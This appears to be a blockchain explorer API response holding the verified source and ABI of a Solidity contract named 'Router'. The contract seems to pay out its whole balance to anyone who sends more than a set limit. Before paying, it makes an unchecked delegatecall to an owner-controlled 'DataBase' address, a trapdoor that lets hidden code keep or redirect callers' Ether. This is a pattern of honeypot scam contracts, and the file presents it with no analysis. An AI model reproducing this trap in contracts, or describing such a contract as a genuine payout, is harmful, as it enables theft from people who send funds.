{"status": "1", "message": "OK", "result": [{"SourceCode": "pragma solidity ^0.4.18;\r\n\r\ncontract Router\r\n{\r\n    address public Owner = msg.sender;\r\n    address public DataBase;\r\n    uint256 public Limit;\r\n    \r\n    \r\n    function Set(address dataBase, uint256 limit)\r\n    {\r\n        require(msg.sender == Owner);\r\n        Limit = limit;\r\n        DataBase = dataBase;\r\n    }\r\n    \r\n    function()payable{}\r\n    \r\n    function transfer(address adr)\r\n    payable\r\n    {\r\n        if(msg.value>Limit)\r\n        {        \r\n            DataBase.delegatecall(bytes4(sha3(\"AddToDB(address)\")),msg.sender);\r\n            adr.transfer(this.balance);\r\n        }\r\n    }\r\n    \r\n}", "ABI": "[{\"constant\":false,\"inputs\":[{\"name\":\"adr\",\"type\":\"address\"}],\"name\":\"transfer\",\"outputs\":[],\"payable\":true,\"stateMutability\":\"payable\",\"type\":\"function\"},{\"constant\":true,\"inputs\":[],\"name\":\"Limit\",\"outputs\":[{\"name\":\"\",\"type\":\"uint256\"}],\"payable\":false,\"stateMutability\":\"view\",\"type\":\"function\"},{\"constant\":true,\"inputs\":[],\"name\":\"DataBase\",\"outputs\":[{\"name\":\"\",\"type\":\"address\"}],\"payable\":false,\"stateMutability\":\"view\",\"type\":\"function\"},{\"constant\":true,\"inputs\":[],\"name\":\"Owner\",\"outputs\":[{\"name\":\"\",\"type\":\"address\"}],\"payable\":false,\"stateMutability\":\"view\",\"type\":\"function\"},{\"constant\":false,\"inputs\":[{\"name\":\"dataBase\",\"type\":\"address\"},{\"name\":\"limit\",\"type\":\"uint256\"}],\"name\":\"Set\",\"outputs\":[],\"payable\":false,\"stateMutability\":\"nonpayable\",\"type\":\"function\"},{\"payable\":true,\"stateMutability\":\"payable\",\"type\":\"fallback\"}]", "ContractName": "Router", "CompilerVersion": "v0.4.18+commit.9cf6e910", "OptimizationUsed": "0", "Runs": "200", "ConstructorArguments": "", "Library": "", "SwarmSource": "bzzr://c5f657131f463298f2da4b3f676375b9ebb1b12333801ca91e45c26d6af7673b"}]}